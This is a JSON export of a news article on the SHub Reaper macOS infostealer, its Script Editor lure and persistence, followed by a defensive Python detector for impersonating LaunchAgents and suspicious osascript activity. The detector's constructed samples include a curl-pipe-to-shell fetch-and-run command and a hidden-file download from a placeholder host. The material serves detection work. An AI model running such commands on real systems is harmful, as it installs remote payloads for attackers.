{"id":8216,"date":"2026-05-20T11:49:23","date_gmt":"2026-05-20T11:49:23","guid":{"rendered":"https:\/\/cybersecurityinfocus.com\/?p=8216"},"modified":"2026-05-20T11:49:23","modified_gmt":"2026-05-20T11:49:23","slug":"shub-reaper-impersonates-apple-google-and-microsoft-in-one-macos-attack-chain","status":"publish","type":"post","link":"https:\/\/cybersecurityinfocus.com\/?p=8216","title":{"rendered":"SHub Reaper impersonates Apple, Google, and Microsoft in one macOS attack chain"},"content":{"rendered":"<div>\n<div class=\"grid grid--cols-10@md grid--cols-8@lg article-column\">\n<div class=\"col-12 col-10@md col-6@lg col-start-3@lg\">\n<div class=\"article-column__content\">\n<div class=\"container\"><\/div>\n<p>A newly disclosed macOS infostealer campaign is exploiting user trust in some of the biggest names in tech to slip past defenses.<\/p>\n<p>Researchers at SentinelOne have detailed a new variant of the SHub malware family, dubbed \u201cReaper,\u201d that impersonates Apple, Google, and Microsoft at different stages of a single attack chain targeting Mac users. The SHub stealer family, first identified two years ago, previously <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2026\/05\/06\/clickfix-campaign-uses-fake-macos-utilities-lures-deliver-infostealers\/\" target=\"_blank\" rel=\"noopener\">used<\/a> variants relying on fake installers and ClickFix-style social engineering, often prompting victims to paste commands into Terminal.<\/p>\n<p>Reaper changes tactics by moving execution into Apple\u2019s Script Editor, sidestepping the protections Apple recently introduced to curb Terminal-based attacks. 
The end goal, however, remains credential theft, wallet compromise, and persistent access.<\/p>\n<p>\u201cThe SHub Reaper variant represents a noteworthy evolution in macOS infostealers by shifting away from standard social engineering tactics that require victims to manually paste commands into the Terminal,\u201d said <a href=\"https:\/\/www.linkedin.com\/in\/jason-soroko-19b41920\/\" target=\"_blank\" rel=\"noopener\">Jason Soroko<\/a>, senior fellow at Sectigo. \u201cThis approach lowers the technical barrier for infection and demonstrates a strategic pivot toward abusing native application handlers rather than relying purely on user error.\u201d<\/p>\n<h2 class=\"wp-block-heading\">Fake Apple updates run hidden AppleScript<\/h2>\n<p>The attack starts with users pulled onto malicious websites displaying fake Apple security alerts. The pages then initiate a ClickFix workflow by instructing users to launch a supposed fix through Script Editor instead of Terminal.<\/p>\n<p>Rather than having the user copy and paste shell commands, as earlier variants did, Reaper <a href=\"https:\/\/www.jamf.com\/blog\/clickfix-macos-script-editor-atomic-stealer\/?tblci=GitHub+repo\" target=\"_blank\" rel=\"noopener\">abuses<\/a> the applescript:\/\/ URI handler to pre-populate malicious AppleScript inside Script Editor. The victim is then socially engineered, through the <a href=\"https:\/\/www.csoonline.com\/article\/4170747\/clickfix-finds-a-backup-plan-in-pysoxy-proxy-chains.html\">ClickFix<\/a> lure, into running the script themselves.<\/p>\n<p>The victims still execute the malware themselves, but they no longer paste a command they might recognize as dangerous: the script is already loaded in Script Editor, and all that remains is to run it.<\/p>\n<p>SentinelOne researchers noted the malware also performs several environment and anti-analysis checks before continuing execution. 
Once active, the malware deploys additional payloads and establishes persistence through LaunchAgents posing as legitimate vendor files.<\/p>\n<p>\u201cDefenders should shift macOS detection from file signatures to behavior, because Reaper executes through legitimate Apple tools and drops no obvious malicious app for a scanner to catch,\u201d said <a href=\"https:\/\/www.linkedin.com\/in\/collin-hogue-spears\/\" target=\"_blank\" rel=\"noopener\">Collin Hogue-Spears<\/a>, senior director of solution management at Black Duck. \u201cScript Editor, osascript, and a LaunchAgent are all legitimate software.\u201d<\/p>\n<h2 class=\"wp-block-heading\">The multi-brand deception<\/h2>\n<p>Researchers observed the malware using branding associated with multiple technology companies throughout the attack chain. Apple-themed security warnings lure victims into initiating execution, Google-related interfaces help maintain legitimacy during later stages, and Microsoft-themed domains and infrastructure are used elsewhere in the operation.<\/p>\n<p>\u201cReaper uses fake WeChat and Miro installers as lures, but what stands out is the way the infection chain shifts its disguise at each stage,\u201d the researchers said in a <a href=\"https:\/\/www.sentinelone.com\/blog\/shub-reaper-macos-stealer-spoofs-apple-google-and-microsoft-in-a-single-attack-chain\/\" target=\"_blank\" rel=\"noopener\">blog post<\/a>. \u201cThe payload may be hosted on a typo-squatted Microsoft domain, executed under the guise of an Apple security update, and persist from a fake Google Software Update directory.\u201d<\/p>\n<p>Once execution succeeds, Reaper starts harvesting sensitive user data. 
SentinelOne said the malware targets browser credentials, password managers, Keychain data, cryptocurrency wallets such as MetaMask and Phantom, messaging applications, and user documents.<\/p>\n<h2 class=\"wp-block-heading\">Protection beyond blocking Terminal pastes<\/h2>\n<p>The SHub Reaper campaign\u2019s move away from the Terminal-centric infection flow appears to be a response to Apple\u2019s recent efforts to crack down on Terminal paste abuse.<\/p>\n<p>In macOS Tahoe 26.4, Apple introduced <a href=\"https:\/\/www.csoonline.com\/article\/4156500\/new-clickfix-variant-bypasses-apple-safeguards-with-one%E2%80%91click-script-execution.html\">protections<\/a> that display warnings when users attempt to paste potentially dangerous commands into Terminal, directly targeting the social engineering methods widely abused in ClickFix-style attacks.<\/p>\n<p>\u201cThis is not an Apple security failure,\u201d Hogue-Spears said. \u201cIt is Apple\u2019s fix working exactly as intended. The fix raised the cost of one technique; so the crew switched to another.\u201d Apple did not immediately respond to CSO\u2019s request for comment.<\/p>\n<p>SentinelOne researchers recommended that defenders monitor for unusual Script Editor activity and investigate where \u201cosascript\u201d or AppleScript-related processes spawn unexpected processes or initiate outbound network connections. They also advised organizations to watch for suspicious LaunchAgent persistence mechanisms posing as legitimate Apple, Google or Microsoft components.<\/p>\n<p>Additionally, Soroko suggested network-based protections. 
\u201cSecurity teams should implement strict web filtering to intercept typo-squatted domains and monitor for anomalous invocations of the macOS Script Editor triggered directly by web browsers,\u201d he said.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>A newly disclosed macOS infostealer campaign is exploiting user trust in some of the biggest names in tech to slip past defenses. Researchers at SentinelOne have detailed a new variant of the SHub malware family, dubbed \u201cReaper,\u201d that impersonates Apple, Google, and Microsoft at different stages of a single attack chain targeting Mac users. The [&hellip;]<\/p>\n","protected":false},"author":0,"featured_media":8217,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-8216","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-education"],"_links":{"self":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/8216"}],"collection":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8216"}],"version-history":[{"count":0,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/8216\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/media\/8217"}],"wp:attachment":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8216"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8216"},{"taxonomy":"post_tag","
embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8216"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
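The detection guidance in the article (osascript or Script Editor spawning unexpected processes or connecting out, Script Editor launched straight from a browser, and LaunchAgents dressed up as Apple, Google or Microsoft components) is the kind of behaviour check that is easy to script. The Python below is an added illustration written for this page; it is not SentinelOne's, Apple's or the malware's code. The LaunchAgent plists, vendor install roots, process events, labels, paths and hostnames in it are constructed samples and assumptions, not indicators from the campaign.

```python
"""Behaviour triage for the SHub Reaper pattern described in the article.

Two checks: (1) LaunchAgent plists whose Label borrows Apple/Google/Microsoft
naming but whose program runs from somewhere those vendors never install to,
or that invoke an interpreter; (2) process events where a browser launches
Script Editor, or Script Editor / osascript spawns a shell or downloader or
connects out. Added illustration, not SentinelOne's or Apple's code; every
sample, path, label and host below is constructed.
"""
import plistlib
from typing import Dict, List

VENDOR_PREFIXES = ("com.apple.", "com.google.", "com.microsoft.")

# Assumed default install roots for each vendor's own agents (substring match
# so per-user ~/Library/Google/... paths qualify). Tune for your fleet.
VENDOR_ROOTS = {
    "com.apple.": ("/System/", "/usr/libexec/", "/usr/bin/", "/usr/sbin/"),
    "com.google.": ("/Library/Google/", "/Applications/Google "),
    "com.microsoft.": ("/Library/Application Support/Microsoft/", "/Applications/Microsoft "),
}
STAGING_DIRS = ("/tmp/", "/private/tmp/", "/var/folders/", "/Users/Shared/")
INTERPRETERS = {"osascript", "sh", "bash", "zsh", "python3", "curl", "nohup", "base64"}
SCRIPT_HOSTS = {"osascript", "Script Editor"}
BROWSERS = {"Safari", "Google Chrome", "firefox", "Microsoft Edge"}


def _basename(path: str) -> str:
    return path.rstrip("/").rsplit("/", 1)[-1]


def _has_hidden_component(path: str) -> bool:
    """True if any directory or file in the path starts with a dot."""
    return any(p.startswith(".") and p not in (".", "..") for p in path.split("/"))


def launch_agent_findings(plist_bytes: bytes) -> List[str]:
    """Reasons a LaunchAgent plist looks like vendor-impersonating persistence."""
    agent = plistlib.loads(plist_bytes)
    label = agent.get("Label", "")
    args = list(agent.get("ProgramArguments") or [])
    if not args and "Program" in agent:
        args = [agent["Program"]]
    program = args[0] if args else ""
    reasons: List[str] = []

    brand = next((p for p in VENDOR_PREFIXES if label.startswith(p)), None)
    if brand and not any(root in program for root in VENDOR_ROOTS[brand]):
        reasons.append(f"{label}: {brand} branding but program outside vendor roots ({program})")
    if any(d in program for d in STAGING_DIRS):
        reasons.append(f"{label}: program runs from a staging directory ({program})")
    if any(_has_hidden_component(a) for a in args):
        reasons.append(f"{label}: hidden directory in ProgramArguments")
    invoked = {_basename(a) for a in args} & INTERPRETERS
    if invoked:
        reasons.append(f"{label}: ProgramArguments invoke {sorted(invoked)}")
    return reasons


def process_findings(events: List[Dict]) -> List[str]:
    """Reasons a parent/child process event matches the Reaper execution pattern.

    Each event is {"parent": path, "child": path, "args": [...], "dest": "host:port"}.
    Sensors often attribute a URI-handler launch to launchd rather than the
    browser; use the responsible-process field where your telemetry has one.
    """
    reasons: List[str] = []
    for ev in events:
        parent, child = _basename(ev["parent"]), _basename(ev["child"])
        if parent in BROWSERS and child == "Script Editor":
            reasons.append(f"{parent} launched Script Editor (applescript:// handler)")
        if parent in SCRIPT_HOSTS and child in INTERPRETERS:
            reasons.append(f"{parent} spawned {child}: {' '.join(ev.get('args', []))}")
        if parent in SCRIPT_HOSTS and ev.get("dest"):
            reasons.append(f"{parent} -> {child} connected out to {ev['dest']}")
    return reasons


# Constructed sample LaunchAgents (hypothetical labels and paths).
HOME = "/Users/alice"
SAMPLE_AGENTS = {
    "legit_google": plistlib.dumps({
        "Label": "com.google.keystone.agent",
        "ProgramArguments": [HOME + "/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle"
                             "/Contents/Helpers/GoogleSoftwareUpdateAgent.app/Contents/MacOS/GoogleSoftwareUpdateAgent",
                             "-runMode", "ifneeded"]}),
    "fake_apple": plistlib.dumps({
        "Label": "com.apple.security.update", "RunAtLoad": True,
        "ProgramArguments": ["/usr/bin/osascript", HOME + "/Library/Application Support/.security/update.scpt"]}),
    "fake_google": plistlib.dumps({
        "Label": "com.google.software.update",
        "ProgramArguments": [HOME + "/Library/Application Support/GoogleSoftwareUpdate/.agent/update"]}),
    "fake_microsoft": plistlib.dumps({
        "Label": "com.microsoft.update.agent", "Program": "/private/tmp/MicrosoftUpdate/agent"}),
}

# Constructed process events (hypothetical hostnames and addresses).
SAMPLE_EVENTS = [
    {"parent": "/Applications/Safari.app/Contents/MacOS/Safari",
     "child": "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor"},
    {"parent": "/usr/bin/osascript", "child": "/bin/sh",
     "args": ["sh", "-c", "curl -fsSL https://update.example.invalid/p | sh"]},
    {"parent": "/usr/bin/osascript", "child": "/usr/bin/curl",
     "args": ["curl", "-o", "/tmp/.u", "https://update.example.invalid/p"], "dest": "203.0.113.10:443"},
    {"parent": "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome",
     "child": "/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper"},
]

if __name__ == "__main__":
    for name, data in SAMPLE_AGENTS.items():
        print(name, launch_agent_findings(data) or "clean")
    for line in process_findings(SAMPLE_EVENTS):
        print(line)
```

On a real host you would feed launch_agent_findings() the bytes of each plist under ~/Library/LaunchAgents and /Library/LaunchAgents, and process_findings() the parent/child records from your EDR or Endpoint Security telemetry. A match is a triage lead, not a verdict: the legitimate Google updater in the samples passes cleanly, and running `codesign -v` on the flagged program path is what settles whether a file really belongs to the vendor whose name the label borrows.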